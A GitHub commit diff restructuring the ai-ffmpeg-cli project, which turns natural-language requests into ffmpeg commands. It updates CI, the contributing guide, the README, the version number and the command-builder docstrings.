mirror of
https://github.com/d-k-patel/ai-ffmpeg-cli.git
synced 2025-10-09 13:42:56 +03:00
refactor: major codebase restructuring and modularization
- Reorganize core modules with improved separation of concerns - Split context scanning into basic and extended implementations - Consolidate security modules into dedicated credential and path security - Replace monolithic intent schema with modular intent models - Add comprehensive logging configuration system - Implement new file operations and prompt enhancement modules - Create structured test organization with unit, integration, security, and performance tests - Remove deprecated modules and consolidate functionality - Update CI/CD pipeline and project configuration - Enhance documentation and contributing guidelines This refactoring improves maintainability, testability, and modularity while preserving core functionality.
This commit is contained in:
4
.github/workflows/ci.yml
vendored
4
.github/workflows/ci.yml
vendored
@@ -19,7 +19,7 @@ jobs:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-latest, windows-latest, macos-latest]
|
||||
os: [ubuntu-latest, macos-latest]
|
||||
python-version: ['3.10', '3.11', '3.12', '3.13']
|
||||
|
||||
steps:
|
||||
@@ -37,8 +37,6 @@ jobs:
|
||||
sudo apt update && sudo apt install -y ffmpeg
|
||||
elif [[ "${{ matrix.os }}" == "macos-latest" ]]; then
|
||||
brew install ffmpeg
|
||||
elif [[ "${{ matrix.os }}" == "windows-latest" ]]; then
|
||||
choco install ffmpeg
|
||||
fi
|
||||
|
||||
- name: Cache dependencies
|
||||
|
||||
102
CHANGELOG.md
102
CHANGELOG.md
@@ -1,102 +0,0 @@
|
||||
# Changelog
|
||||
|
||||
All notable changes to aiclip will be documented in this file.
|
||||
|
||||
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
|
||||
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
|
||||
|
||||
## [Unreleased]
|
||||
|
||||
### Added
|
||||
- Upcoming features will be listed here
|
||||
|
||||
### Changed
|
||||
- Upcoming changes will be listed here
|
||||
|
||||
### Fixed
|
||||
- Upcoming fixes will be listed here
|
||||
|
||||
## [0.1.3] - 2025-08-19
|
||||
|
||||
### Fixed
|
||||
- CLI crash on `--help` due to unsupported `Optional[typer.Context]` annotation. Refactored callback to require `Context` and added an internal wrapper for tests.
|
||||
|
||||
### Changed
|
||||
- Documentation updates clarifying correct usage of global options and subcommands. Added examples for `nl` subcommand and a note to avoid invoking the binary twice.
|
||||
|
||||
## [0.1.4] - 2025-08-19
|
||||
|
||||
### Documentation
|
||||
- Fix README first command section formatting (interactive vs one-shot examples) and minor spacing in table snippet.
|
||||
|
||||
## [0.1.0] - 2024-01-XX
|
||||
|
||||
### Added
|
||||
- 🎬 Initial release of aiclip
|
||||
- 🤖 AI-powered natural language to ffmpeg command translation
|
||||
- 🔒 Safety-first approach with command preview before execution
|
||||
- ⚡ Support for common video operations:
|
||||
- Video format conversion (mov, mp4, etc.)
|
||||
- Video scaling and resolution changes
|
||||
- Video compression with quality control
|
||||
- Audio extraction and removal
|
||||
- Video trimming and segmentation
|
||||
- Thumbnail and frame extraction
|
||||
- Video overlay and watermarking
|
||||
- Batch processing with glob patterns
|
||||
|
||||
### Features
|
||||
- Interactive CLI mode for iterative workflows
|
||||
- One-shot command execution for automation
|
||||
- Smart defaults for codecs and quality settings
|
||||
- Context scanning for automatic file detection
|
||||
- Comprehensive error handling with helpful messages
|
||||
- Overwrite protection for existing files
|
||||
- Rich terminal output with formatted tables
|
||||
- Configurable AI models (GPT-4o, GPT-4o-mini)
|
||||
- Environment-based configuration
|
||||
- Dry-run mode for command preview
|
||||
- Verbose logging for debugging
|
||||
|
||||
### Technical
|
||||
- Python 3.10+ support
|
||||
- Built with Typer for CLI framework
|
||||
- OpenAI GPT integration for natural language processing
|
||||
- Pydantic for robust data validation
|
||||
- Rich for beautiful terminal output
|
||||
- Comprehensive test suite with pytest
|
||||
- Code quality tools (ruff, mypy)
|
||||
- Docker support
|
||||
- GitHub Actions CI/CD pipeline
|
||||
|
||||
### Documentation
|
||||
- Comprehensive README with examples
|
||||
- API documentation
|
||||
- Contributing guidelines
|
||||
- Development setup instructions
|
||||
|
||||
---
|
||||
|
||||
## Release Notes Template
|
||||
|
||||
When preparing a new release, copy this template:
|
||||
|
||||
### [X.Y.Z] - YYYY-MM-DD
|
||||
|
||||
#### Added
|
||||
- New features
|
||||
|
||||
#### Changed
|
||||
- Changes in existing functionality
|
||||
|
||||
#### Deprecated
|
||||
- Soon-to-be removed features
|
||||
|
||||
#### Removed
|
||||
- Now removed features
|
||||
|
||||
#### Fixed
|
||||
- Bug fixes
|
||||
|
||||
#### Security
|
||||
- Vulnerability fixes
|
||||
405
CONTRIBUTING.md
405
CONTRIBUTING.md
@@ -1,103 +1,374 @@
|
||||
# Contributing to aiclip
|
||||
# Contributing to ai-ffmpeg-cli
|
||||
|
||||
Thank you for your interest in contributing to aiclip! 🎉
|
||||
Thank you for your interest in contributing to ai-ffmpeg-cli! This document provides guidelines and information for contributors.
|
||||
|
||||
We welcome contributions of all kinds:
|
||||
- 🐛 Bug reports and fixes
|
||||
- ✨ New features and enhancements
|
||||
- 📖 Documentation improvements
|
||||
- 🧪 Tests and quality improvements
|
||||
- 💡 Ideas and suggestions
|
||||
## 🤝 How to Contribute
|
||||
|
||||
## Quick Start
|
||||
We welcome contributions from the community! Here are the main ways you can help:
|
||||
|
||||
1. **Fork & Clone**
|
||||
### 🐛 Bug Reports
|
||||
|
||||
Found a bug? Please report it! Before creating an issue:
|
||||
|
||||
1. **Check existing issues** - Search for similar problems
|
||||
2. **Provide details** - Include error messages, steps to reproduce, and system info
|
||||
3. **Test with latest version** - Ensure you're using the most recent release
|
||||
|
||||
**Bug report template:**
|
||||
```markdown
|
||||
## Bug Description
|
||||
Brief description of the issue
|
||||
|
||||
## Steps to Reproduce
|
||||
1. Run command: `aiclip "your command here"`
|
||||
2. Expected: [what should happen]
|
||||
3. Actual: [what actually happened]
|
||||
|
||||
## Environment
|
||||
- OS: [macOS/Windows/Linux]
|
||||
- Python version: [3.10+]
|
||||
- ai-ffmpeg-cli version: [version]
|
||||
- ffmpeg version: [version]
|
||||
|
||||
## Error Messages
|
||||
```
|
||||
[Paste any error messages here]
|
||||
```
|
||||
|
||||
## Additional Context
|
||||
Any other relevant information
|
||||
```
|
||||
|
||||
### 💡 Feature Requests
|
||||
|
||||
Have an idea for a new feature? We'd love to hear it!
|
||||
|
||||
**Feature request template:**
|
||||
```markdown
|
||||
## Feature Description
|
||||
Brief description of the feature
|
||||
|
||||
## Use Case
|
||||
How would this feature be used? What problem does it solve?
|
||||
|
||||
## Proposed Implementation
|
||||
Any thoughts on how this could be implemented?
|
||||
|
||||
## Alternatives Considered
|
||||
Are there other ways to solve this problem?
|
||||
```
|
||||
|
||||
### 📝 Documentation
|
||||
|
||||
Help improve our documentation! Areas that need attention:
|
||||
|
||||
- **README.md** - Main project documentation
|
||||
- **Code comments** - Inline documentation
|
||||
- **Examples** - Usage examples and tutorials
|
||||
- **Troubleshooting** - Common issues and solutions
|
||||
|
||||
### 🧪 Testing
|
||||
|
||||
Help us maintain code quality by:
|
||||
|
||||
- **Writing tests** - Add tests for new features
|
||||
- **Running tests** - Ensure existing tests pass
|
||||
- **Test coverage** - Improve test coverage
|
||||
|
||||
### 🔧 Code Contributions
|
||||
|
||||
Ready to write code? Here's how to get started:
|
||||
|
||||
## 🛠️ Development Setup
|
||||
|
||||
### Prerequisites
|
||||
|
||||
- **Python 3.10+**
|
||||
- **ffmpeg** installed and in PATH
|
||||
- **Git** for version control
|
||||
- **OpenAI API key** for testing
|
||||
|
||||
### Local Development
|
||||
|
||||
1. **Clone the repository**
|
||||
```bash
|
||||
git clone https://github.com/yourusername/ai-ffmpeg-cli.git
|
||||
git clone https://github.com/d-k-patel/ai-ffmpeg-cli.git
|
||||
cd ai-ffmpeg-cli
|
||||
```
|
||||
|
||||
2. **Setup Development Environment**
|
||||
2. **Set up virtual environment**
|
||||
```bash
|
||||
make setup
|
||||
source .venv/bin/activate
|
||||
python -m venv .venv
|
||||
source .venv/bin/activate # On Windows: .venv\Scripts\activate
|
||||
```
|
||||
|
||||
3. **Run Tests**
|
||||
3. **Install dependencies**
|
||||
```bash
|
||||
make test
|
||||
make lint
|
||||
pip install -e ".[dev]"
|
||||
```
|
||||
|
||||
4. **Make Changes & Test**
|
||||
4. **Set up environment variables**
|
||||
```bash
|
||||
# Make your changes
|
||||
make test # Ensure tests pass
|
||||
make format # Format code
|
||||
make demo # Test functionality
|
||||
cp .env.sample .env
|
||||
# Edit .env with your OpenAI API key
|
||||
```
|
||||
|
||||
5. **Submit Pull Request**
|
||||
- Create a feature branch
|
||||
- Make your changes with tests
|
||||
- Update documentation if needed
|
||||
- Submit PR with clear description
|
||||
5. **Run tests**
|
||||
```bash
|
||||
pytest
|
||||
```
|
||||
|
||||
## Development Workflow
|
||||
### Project Structure
|
||||
|
||||
### Testing
|
||||
```bash
|
||||
make test # Run all tests
|
||||
make test-cov # Run with coverage
|
||||
make demo # Manual testing
|
||||
```
|
||||
ai-ffmpeg-cli/
|
||||
├── src/ai_ffmpeg_cli/ # Main source code
|
||||
│ ├── __init__.py
|
||||
│ ├── main.py # CLI entry point
|
||||
│ ├── config.py # Configuration management
|
||||
│ ├── llm_client.py # AI model integration
|
||||
│ ├── intent_router.py # Command routing
|
||||
│ ├── executor.py # Command execution
|
||||
│ ├── prompt_enhancer.py # Prompt optimization
|
||||
│ ├── context_scanner.py # File context scanning
|
||||
│ └── path_security.py # Security validation
|
||||
├── tests/ # Test suite
|
||||
├── docs/ # Documentation
|
||||
├── assets/ # Images and resources
|
||||
└── README.md # Project documentation
|
||||
```
|
||||
|
||||
### Code Quality
|
||||
## 📋 Coding Standards
|
||||
|
||||
### Python Style Guide
|
||||
|
||||
We follow [PEP 8](https://pep8.org/) with some modifications:
|
||||
|
||||
- **Line length**: 88 characters (Black formatter)
|
||||
- **Type hints**: Required for all functions
|
||||
- **Docstrings**: Google style for all public functions
|
||||
- **Imports**: Organized with `isort`
|
||||
|
||||
### Code Quality Tools
|
||||
|
||||
We use several tools to maintain code quality:
|
||||
|
||||
```bash
|
||||
make lint # Check code quality
|
||||
make format # Auto-format code
|
||||
make security # Security checks
|
||||
# Format code
|
||||
black src/ tests/
|
||||
isort src/ tests/
|
||||
|
||||
# Lint code
|
||||
flake8 src/ tests/
|
||||
mypy src/
|
||||
|
||||
# Run all quality checks
|
||||
make lint
|
||||
```
|
||||
|
||||
### Testing Guidelines
|
||||
|
||||
- **Test coverage**: Aim for >90% coverage
|
||||
- **Test types**: Unit tests, integration tests, and CLI tests
|
||||
- **Test naming**: Descriptive test names that explain the scenario
|
||||
- **Fixtures**: Use pytest fixtures for common setup
|
||||
|
||||
**Example test structure:**
|
||||
```python
|
||||
def test_feature_name_success_case():
|
||||
"""Test that feature works correctly in normal case."""
|
||||
# Arrange
|
||||
input_data = "test input"
|
||||
|
||||
# Act
|
||||
result = function_under_test(input_data)
|
||||
|
||||
# Assert
|
||||
assert result == expected_output
|
||||
```
|
||||
|
||||
## 🔄 Pull Request Process
|
||||
|
||||
### Before Submitting
|
||||
```bash
|
||||
make pre-commit # Run all checks
|
||||
|
||||
1. **Create a feature branch**
|
||||
```bash
|
||||
git checkout -b feature/your-feature-name
|
||||
```
|
||||
|
||||
2. **Make your changes**
|
||||
- Write code following our standards
|
||||
- Add tests for new functionality
|
||||
- Update documentation if needed
|
||||
|
||||
3. **Run quality checks**
|
||||
```bash
|
||||
make lint
|
||||
make test
|
||||
```
|
||||
|
||||
4. **Commit your changes**
|
||||
```bash
|
||||
git add .
|
||||
git commit -m "feat: add new feature description"
|
||||
```
|
||||
|
||||
### Commit Message Format
|
||||
|
||||
We use [Conventional Commits](https://www.conventionalcommits.org/):
|
||||
|
||||
```
|
||||
type(scope): description
|
||||
|
||||
[optional body]
|
||||
|
||||
[optional footer]
|
||||
```
|
||||
|
||||
## Contribution Guidelines
|
||||
**Types:**
|
||||
- `feat`: New feature
|
||||
- `fix`: Bug fix
|
||||
- `docs`: Documentation changes
|
||||
- `style`: Code style changes (formatting, etc.)
|
||||
- `refactor`: Code refactoring
|
||||
- `test`: Adding or updating tests
|
||||
- `chore`: Maintenance tasks
|
||||
|
||||
### Bug Reports
|
||||
Please include:
|
||||
- Clear description of the issue
|
||||
- Steps to reproduce
|
||||
- Expected vs actual behavior
|
||||
- Your environment (OS, Python version, ffmpeg version)
|
||||
- Example command that fails
|
||||
**Examples:**
|
||||
```
|
||||
feat(cli): add --output-dir option for custom output directory
|
||||
fix(llm): resolve duration parameter not being applied to GIFs
|
||||
docs(readme): update installation instructions
|
||||
test(executor): add tests for command validation
|
||||
```
|
||||
|
||||
### Feature Requests
|
||||
- Describe the use case
|
||||
- Explain why it would be valuable
|
||||
- Provide example usage if possible
|
||||
### Pull Request Guidelines
|
||||
|
||||
### Code Contributions
|
||||
- Follow existing code style
|
||||
- Add tests for new functionality
|
||||
- Update documentation
|
||||
- Keep commits focused and descriptive
|
||||
1. **Title**: Clear, descriptive title
|
||||
2. **Description**: Explain what and why (not how)
|
||||
3. **Related issues**: Link to any related issues
|
||||
4. **Screenshots**: Include screenshots for UI changes
|
||||
5. **Testing**: Describe how to test your changes
|
||||
|
||||
## Code Style
|
||||
**PR template:**
|
||||
```markdown
|
||||
## Description
|
||||
Brief description of changes
|
||||
|
||||
We use:
|
||||
- **ruff** for linting and formatting
|
||||
- **mypy** for type checking
|
||||
- **pytest** for testing
|
||||
## Type of Change
|
||||
- [ ] Bug fix
|
||||
- [ ] New feature
|
||||
- [ ] Documentation update
|
||||
- [ ] Test addition/update
|
||||
- [ ] Other (please describe)
|
||||
|
||||
Run `make format` to auto-format your code.
|
||||
## Testing
|
||||
- [ ] All tests pass
|
||||
- [ ] New tests added for new functionality
|
||||
- [ ] Manual testing completed
|
||||
|
||||
## Questions?
|
||||
## Checklist
|
||||
- [ ] Code follows style guidelines
|
||||
- [ ] Self-review completed
|
||||
- [ ] Documentation updated
|
||||
- [ ] No breaking changes (or breaking changes documented)
|
||||
```
|
||||
|
||||
- 💬 **Discussions**: Use GitHub Discussions for questions
|
||||
- 🐛 **Issues**: Use GitHub Issues for bugs
|
||||
- 📧 **Email**: Contact maintainers directly for sensitive issues
|
||||
## 🎯 Areas for Contribution
|
||||
|
||||
### High Priority
|
||||
|
||||
- **Duration handling improvements** - Better support for time-based requests
|
||||
- **Error handling** - More user-friendly error messages
|
||||
- **Performance optimization** - Faster command generation
|
||||
- **Test coverage** - Improve test coverage for edge cases
|
||||
|
||||
### Medium Priority
|
||||
|
||||
- **New ffmpeg operations** - Support for more complex operations
|
||||
- **UI improvements** - Better interactive mode experience
|
||||
- **Documentation** - More examples and tutorials
|
||||
- **Integration tests** - End-to-end testing
|
||||
|
||||
### Low Priority
|
||||
|
||||
- **Performance monitoring** - Metrics and analytics
|
||||
- **Plugin system** - Extensibility framework
|
||||
- **GUI mode** - Visual interface
|
||||
- **Batch processing** - Multi-file operations
|
||||
|
||||
## 🐛 Common Issues
|
||||
|
||||
### Development Environment
|
||||
|
||||
**"Module not found" errors**
|
||||
```bash
|
||||
# Ensure you're in the virtual environment
|
||||
source .venv/bin/activate
|
||||
|
||||
# Install in development mode
|
||||
pip install -e ".[dev]"
|
||||
```
|
||||
|
||||
**"ffmpeg not found"**
|
||||
```bash
|
||||
# Install ffmpeg
|
||||
brew install ffmpeg # macOS
|
||||
sudo apt install ffmpeg # Ubuntu
|
||||
# Windows: download from ffmpeg.org
|
||||
```
|
||||
|
||||
**"OpenAI API key required"**
|
||||
```bash
|
||||
# Set environment variable
|
||||
export OPENAI_API_KEY="your-key-here"
|
||||
|
||||
# Or add to .env file
|
||||
echo "OPENAI_API_KEY=your-key-here" >> .env
|
||||
```
|
||||
|
||||
### Testing Issues
|
||||
|
||||
**"Tests failing"**
|
||||
```bash
|
||||
# Run with verbose output
|
||||
pytest -v
|
||||
|
||||
# Run specific test file
|
||||
pytest tests/test_specific.py
|
||||
|
||||
# Run with coverage
|
||||
pytest --cov=src/ai_ffmpeg_cli
|
||||
```
|
||||
|
||||
## Getting Help
|
||||
|
||||
### Community Support
|
||||
|
||||
- **GitHub Issues**: For bugs and feature requests
|
||||
- **GitHub Discussions**: For questions and general discussion
|
||||
|
||||
### Development Questions
|
||||
|
||||
- **Code reviews**: Ask questions in PR comments
|
||||
- **Architecture decisions**: Open a discussion
|
||||
- **Implementation help**: Create an issue with "help wanted" label
|
||||
|
||||
## 🏆 Recognition
|
||||
|
||||
We appreciate all contributions! Contributors will be:
|
||||
|
||||
- **Listed in contributors** - Added to the project contributors list
|
||||
- **Mentioned in releases** - Credit in release notes
|
||||
- **Invited to discussions** - Participate in project decisions
|
||||
|
||||
## 📄 License
|
||||
|
||||
By contributing to ai-ffmpeg-cli, you agree that your contributions will be licensed under the MIT License.
|
||||
|
||||
---
|
||||
|
||||
Thank you for contributing to ai-ffmpeg-cli! 🎬
|
||||
|
||||
Your contributions help make video processing easier for everyone.
|
||||
|
||||
Thank you for contributing! 🚀
|
||||
|
||||
132
README.md
132
README.md
@@ -1,14 +1,19 @@
|
||||
# 🎬 aiclip
|
||||
# 🎬 ai-ffmpeg-cli
|
||||
|
||||
[](https://badge.fury.io/py/ai-ffmpeg-cli)
|
||||
[](https://pepy.tech/projects/ai-ffmpeg-cli)
|
||||
[](https://www.python.org/downloads/)
|
||||
[](https://opensource.org/licenses/MIT)
|
||||
[](https://codecov.io/github/d-k-patel/ai-ffmpeg-cli)
|
||||
[](https://github.com/d-k-patel/ai-ffmpeg-cli/actions)
|
||||
|
||||
> **Stop Googling ffmpeg commands. Just describe what you want.**
|
||||
|
||||
**aiclip** is an AI-powered CLI that translates natural language into safe, previewable `ffmpeg` commands. Built for developers, content creators, and anyone who works with media files but doesn't want to memorize complex syntax.
|
||||

|
||||
|
||||
## ✨ Why aiclip?
|
||||
**ai-ffmpeg-cli** is an AI-powered CLI that translates natural language into safe, previewable `ffmpeg` commands. Built for developers, content creators, and anyone who works with media files but doesn't want to memorize complex syntax.
|
||||
|
||||
## ✨ Why ai-ffmpeg-cli?
|
||||
|
||||
- 🤖 **AI-Native**: Translate plain English to perfect ffmpeg commands
|
||||
- 🔒 **Safety First**: Preview every command before execution
|
||||
@@ -20,7 +25,7 @@
|
||||
# Instead of this...
|
||||
ffmpeg -i input.mp4 -vf "scale=1280:720" -c:v libx264 -c:a aac -b:v 2000k output.mp4
|
||||
|
||||
# Just say this...
|
||||
# Just say this... (cli command is different)
|
||||
aiclip "convert input.mp4 to 720p with good quality"
|
||||
```
|
||||
|
||||
@@ -31,9 +36,6 @@ aiclip "convert input.mp4 to 720p with good quality"
|
||||
```bash
|
||||
# Install from PyPI
|
||||
pip install ai-ffmpeg-cli
|
||||
|
||||
# Or with Homebrew (coming soon)
|
||||
brew install aiclip
|
||||
```
|
||||
|
||||
### Setup
|
||||
@@ -55,13 +57,43 @@ aiclip
|
||||
```
|
||||
|
||||
```text
|
||||
convert this video to 720p
|
||||
┌───┬──────────────────────────────────────────────────────────┐
|
||||
│ # │ Command │
|
||||
├───┼──────────────────────────────────────────────────────────┤
|
||||
│ 1 │ ffmpeg -i input.mp4 -vf scale=1280:720 -c:v libx264... │
|
||||
└───┴──────────────────────────────────────────────────────────┘
|
||||
Run these commands? [Y/n]
|
||||
╭─────────────────────────────────────── Welcome to Interactive Mode ───────────────────────────────────────╮
|
||||
│ │
|
||||
│ ai-ffmpeg-cli v0.2.2 │
|
||||
│ │
|
||||
│ AI-powered video and audio processing with natural language │
|
||||
│ Type your request in plain English and let AI handle the ffmpeg complexity! │
|
||||
│ │
|
||||
╰───────────────────────────────────────────────────────────────────────────────────────────────────────────╯
|
||||
|
||||
Available Media Files
|
||||
┏━━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
|
||||
┃ Type ┃ Count ┃ Files ┃
|
||||
┡━━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
|
||||
│ Videos │ 1 │ • input.mp4 │
|
||||
│ Images │ 2 │ • logo.png │
|
||||
│ │ │ • watermark.png │
|
||||
└────────┴───────┴────────────────────────────────┘
|
||||
|
||||
╭────────────────────────────────────────── Output Configuration ───────────────────────────────────────────╮
|
||||
│ Output Directory: /path/to/your/aiclip │
|
||||
│ Generated files will be saved here │
|
||||
╰───────────────────────────────────────────────────────────────────────────────────────────────────────────╯
|
||||
|
||||
aiclip> convert this video to 720p
|
||||
|
||||
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━┓
|
||||
┃ # ┃ Command ┃ Output ┃ Status ┃
|
||||
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━┩
|
||||
│ 1 │ ffmpeg -i input.mp4 -vf scale=1280:720... │ /path/to/your/aiclip/input_720p.mp4 │ New │
|
||||
└───┴──────────────────────────────────────────────┴───────────────────────────────────────────────┴────────┘
|
||||
|
||||
╭────────────────────────────────────────── Confirmation Required ──────────────────────────────────────────╮
|
||||
│ │
|
||||
│ Run these commands? │
|
||||
│ │
|
||||
╰───────────────────────────────────────────────────────────────────────────────────────────────────────────╯
|
||||
[y/n]: Using default: Y
|
||||
```
|
||||
|
||||
Or run a one-shot command (no interactive prompt):
|
||||
@@ -84,6 +116,10 @@ aiclip "make input.mp4 1080p resolution"
|
||||
# Compress files
|
||||
aiclip "compress large-video.mp4 to smaller size"
|
||||
aiclip "reduce file size with CRF 23"
|
||||
|
||||
# Create animated GIFs
|
||||
aiclip "convert input.mp4 to animated gif"
|
||||
aiclip "create a 5 second animated gif from video.mp4"
|
||||
```
|
||||
|
||||
### Audio Operations
|
||||
@@ -145,6 +181,9 @@ aiclip --timeout 120 "complex processing task"
|
||||
|
||||
# Verbose logging for troubleshooting
|
||||
aiclip --verbose "your command"
|
||||
|
||||
# Specify custom output directory
|
||||
aiclip --output-dir /path/to/output "convert video.mp4 to 720p"
|
||||
```
|
||||
|
||||
### Subcommands and option placement
|
||||
@@ -174,6 +213,7 @@ OPENAI_API_KEY=sk-your-openai-api-key
|
||||
# Optional
|
||||
AICLIP_MODEL=gpt-4o # AI model to use
|
||||
AICLIP_DRY_RUN=false # Preview commands by default
|
||||
AICLIP_OUTPUT_DIR=aiclip # Default output directory
|
||||
```
|
||||
|
||||
## 🎯 Smart Defaults & Safety
|
||||
@@ -183,6 +223,56 @@ AICLIP_DRY_RUN=false # Preview commands by default
|
||||
- **Sensible Codecs**: Automatically chooses h264+aac for MP4, libx265 for compression
|
||||
- **Stream Copy**: Uses `-c copy` for trimming when possible (faster, lossless)
|
||||
- **Context Aware**: Scans your directory to suggest input files and durations
|
||||
- **Organized Output**: All generated files are saved to a dedicated output directory
|
||||
- **Duration Support**: Automatically handles time-based requests (e.g., "5 second GIF")
|
||||
|
||||
## 📁 Output Directory Management
|
||||
|
||||
aiclip automatically organizes all generated files in a dedicated output directory:
|
||||
|
||||
```bash
|
||||
# Default behavior - files saved to "aiclip" folder
|
||||
aiclip "convert video.mp4 to 720p"
|
||||
# Output: ./aiclip/video_720p.mp4
|
||||
|
||||
# Custom output directory
|
||||
aiclip --output-dir /path/to/output "convert video.mp4 to 720p"
|
||||
# Output: /path/to/output/video_720p.mp4
|
||||
|
||||
# Environment variable configuration
|
||||
export AICLIP_OUTPUT_DIR=my_outputs
|
||||
aiclip "convert video.mp4 to 720p"
|
||||
# Output: ./my_outputs/video_720p.mp4
|
||||
```
|
||||
|
||||
**Benefits:**
|
||||
- 🗂️ **Organized**: All generated files in one place
|
||||
- 🔍 **Easy to find**: No more searching through mixed directories
|
||||
- 🧹 **Clean workspace**: Input files stay separate from outputs
|
||||
- 📊 **Progress tracking**: See all your generated files at a glance
|
||||
|
||||
## ⏱️ Duration and Time Handling
|
||||
|
||||
aiclip intelligently handles time-based requests for video and GIF creation:
|
||||
|
||||
```bash
|
||||
# Create GIFs with specific duration
|
||||
aiclip "convert video.mp4 to 5 second animated gif"
|
||||
aiclip "create a 10 second animated gif from input.mp4"
|
||||
|
||||
# Time-based video operations
|
||||
aiclip "extract first 30 seconds from video.mp4"
|
||||
aiclip "create 15 second clip from input.mp4"
|
||||
|
||||
# Thumbnails at specific times
|
||||
aiclip "extract frame at 2:30 from video.mp4"
|
||||
aiclip "create thumbnail at 10 seconds from input.mp4"
|
||||
```
|
||||
|
||||
**Supported time formats:**
|
||||
- **Seconds**: "5 second", "10s", "30 seconds"
|
||||
- **Time codes**: "2:30", "1:45:30", "00:02:15"
|
||||
- **Duration**: "5 second duration", "10 second clip"
|
||||
|
||||
## 📊 Supported Operations
|
||||
|
||||
@@ -196,12 +286,13 @@ AICLIP_DRY_RUN=false # Preview commands by default
|
||||
| **Thumbnail** | "frame at 10s" | `-ss 00:00:10 -vframes 1` |
|
||||
| **Overlay** | "watermark top-right" | `-filter_complex overlay=W-w-10:10` |
|
||||
| **Batch** | "all *.mov files" | Shell loops with glob patterns |
|
||||
| **GIF Creation** | "animated gif", "5 second gif" | `-vf fps=10,scale=320:-1:flags=lanczos,split[s0][s1];[s0]palettegen[p];[s1][p]paletteuse -c:v gif` |
|
||||
|
||||
## 🛠️ Development
|
||||
|
||||
```bash
|
||||
# Clone and setup
|
||||
git clone https://github.com/yourusername/ai-ffmpeg-cli.git
|
||||
git clone https://github.com/d-k-patel/ai-ffmpeg-cli.git
|
||||
cd ai-ffmpeg-cli
|
||||
make setup
|
||||
|
||||
@@ -254,12 +345,17 @@ sudo apt install ffmpeg # Ubuntu
|
||||
- Check file extensions match your request
|
||||
- Use `ls` to verify available files
|
||||
|
||||
**"Duration not applied to GIF/video"**
|
||||
- Be explicit about duration: "5 second animated gif"
|
||||
- Use clear time specifications: "10 second video clip"
|
||||
- Check that the AI model includes duration in the generated command
|
||||
|
||||
### Getting Help
|
||||
|
||||
- 📖 **Documentation**: Full guides at [docs link]
|
||||
- 💬 **Discord**: Join our community for real-time help
|
||||
- 🐛 **Issues**: Report bugs on [GitHub Issues](https://github.com/yourusername/ai-ffmpeg-cli/issues)
|
||||
- 💡 **Discussions**: Feature requests and Q&A on [GitHub Discussions](https://github.com/yourusername/ai-ffmpeg-cli/discussions)
|
||||
- 🐛 **Issues**: Report bugs on [GitHub Issues](https://github.com/d-k-patel/ai-ffmpeg-cli/issues)
|
||||
- 💡 **Discussions**: Feature requests and Q&A on [GitHub Discussions](https://github.com/d-k-patel/ai-ffmpeg-cli/discussions)
|
||||
|
||||
## 🤝 Contributing
|
||||
|
||||
@@ -280,6 +376,8 @@ See our [Contributing Guide](CONTRIBUTING.md) to get started.
|
||||
- ⚡ **Local Models**: Run without internet using local AI
|
||||
- 🏢 **Team Features**: Shared commands and analytics
|
||||
- 🔌 **Integrations**: GitHub Actions, Docker, CI/CD pipelines
|
||||
- 🎬 **Enhanced Duration Support**: Better handling of time-based requests
|
||||
- 📁 **Advanced Output Management**: Custom naming patterns and organization
|
||||
|
||||
## 📄 License
|
||||
|
||||
|
||||
@@ -4,7 +4,7 @@ build-backend = "hatchling.build"
|
||||
|
||||
[project]
|
||||
name = "ai-ffmpeg-cli"
|
||||
version = "0.1.4"
|
||||
version = "0.2.3"
|
||||
description = "AI-powered CLI that translates natural language to safe ffmpeg commands"
|
||||
readme = { file = "README.md", content-type = "text/markdown" }
|
||||
license = { file = "LICENSE" }
|
||||
@@ -47,7 +47,7 @@ classifiers = [
|
||||
]
|
||||
|
||||
dependencies = [
|
||||
"typer[all]>=0.9.0",
|
||||
"typer>=0.9.0",
|
||||
"rich>=13.0.0",
|
||||
"openai>=1.37.0",
|
||||
"python-dotenv>=1.0.0",
|
||||
|
||||
@@ -1,3 +1,3 @@
|
||||
from .version import __version__
|
||||
from .version_info import __version__
|
||||
|
||||
__all__ = ["__version__"]
|
||||
|
||||
@@ -1,15 +1,34 @@
|
||||
"""Command builder for ai-ffmpeg-cli.
|
||||
|
||||
This module converts command plans into executable ffmpeg command lists,
|
||||
applying appropriate defaults and ensuring proper argument ordering.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
from typing import TYPE_CHECKING
|
||||
|
||||
if TYPE_CHECKING:
|
||||
from .nl_schema import CommandPlan
|
||||
from .intent_models import CommandPlan
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str]]:
|
||||
"""Build executable ffmpeg commands from a command plan.
|
||||
|
||||
Converts a CommandPlan into a list of executable ffmpeg command lists,
|
||||
applying appropriate defaults and ensuring proper argument ordering
|
||||
for optimal performance and compatibility.
|
||||
|
||||
Args:
|
||||
plan: Command plan containing entries to convert
|
||||
assume_yes: Whether to add -y flag to overwrite output files
|
||||
|
||||
Returns:
|
||||
List of ffmpeg command argument lists ready for execution
|
||||
"""
|
||||
commands: list[list[str]] = []
|
||||
for entry in plan.entries:
|
||||
cmd: list[str] = ["ffmpeg"]
|
||||
@@ -22,7 +41,7 @@ def build_commands(plan: CommandPlan, assume_yes: bool = False) -> list[list[str
|
||||
post_input_flags: list[str] = []
|
||||
|
||||
# Split args into pre/post by presence of -ss/-t/-to which are often pre-input
|
||||
# Keep order stable otherwise
|
||||
# Keep order stable otherwise for predictable command generation
|
||||
for i in range(0, len(entry.args), 2):
|
||||
flag = entry.args[i]
|
||||
val = entry.args[i + 1] if i + 1 < len(entry.args) else None
|
||||
